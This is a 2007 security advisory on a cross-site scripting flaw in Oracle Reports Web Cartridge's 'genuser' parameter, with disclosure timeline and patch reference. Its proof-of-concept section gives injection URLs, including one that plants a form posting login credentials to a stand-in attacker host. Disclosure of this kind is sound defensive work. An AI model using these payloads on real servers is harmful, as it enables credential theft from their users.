oracle--isa-xss.txt

`=============================================  
INTERNET SECURITY AUDITORS ALERT 2007-001  
- Original release date: January 17, 2007  
- Last revised: January 17, 2007  
- Discovered by: Vicente Aguilera Diaz  
- Severity: 3/5  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Oracle Reports Web Cartridge (RWCGI60) vulnerable to XSS.  
  
II. BACKGROUND  
-------------------------  
The Reports Web CGI or Web Cartridge is required for the Reports  
Server when using the Oracle Application Server (OAS) to process  
report requests from Web clients.  
  
III. DESCRIPTION  
-------------------------  
Improper validation in "genuser" parameter allows to inject arbitrary  
code script/HTML that will be executed in the client browser.  
  
This is specially serious in authentication forms where a malicious  
user can obtain the credentials of authentication of other users.  
  
IV. PROOF OF CONCEPT  
-------------------------  
URL original:  
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>  
  
This request return a page with an authentication form (with User  
Name, Password, and Database fields).  
  
With a POST method (the rwcgi60 accept both methods: GET and POST),  
the user send:  
username=&password=&database=&authtype=D&genuser=&server=<oracle-reports-server>&nextpage=<next-page>  
  
A malicious user can modify the value of the "genuser" parameter and  
inject arbitrary script/HTML code:  
  
-- Example 1 ---  
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=User  
Name<script>alert('Vulnerable to XSS attack!');</script>  
  
  
--- Example 2 ---  
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=</form><form  
name='AttackerForm'  
  
action='http://attacker-machine.com/credentials'>User Name  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can spoof the session of other authenticated users,  
obtains his authentication credentials, or deface the authentication  
form page.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Oracle9i Application Server Release 2, version 9.0.2.3  
  
VII. SOLUTION  
-------------------------  
The January 2007 CPU (Critical Patch Update) contain fixes for this  
vulnerability.  
  
VIII. REFERENCES  
-------------------------  
-  
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported by  
Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
January 17, 2007: Initial release  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
April 23, 2006: Vulnerability acquired by  
Internet Security Auditors  
April 24, 2006: Initial vendor notification sent.  
April 29, 2006: Initial response of the vendor  
January 16, 2007: The vendor fixed the vulnerability in the CPU.  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security  
  
Auditors, S.L. accepts no responsibility for any damage caused by the  
use or misuse of this information.  
`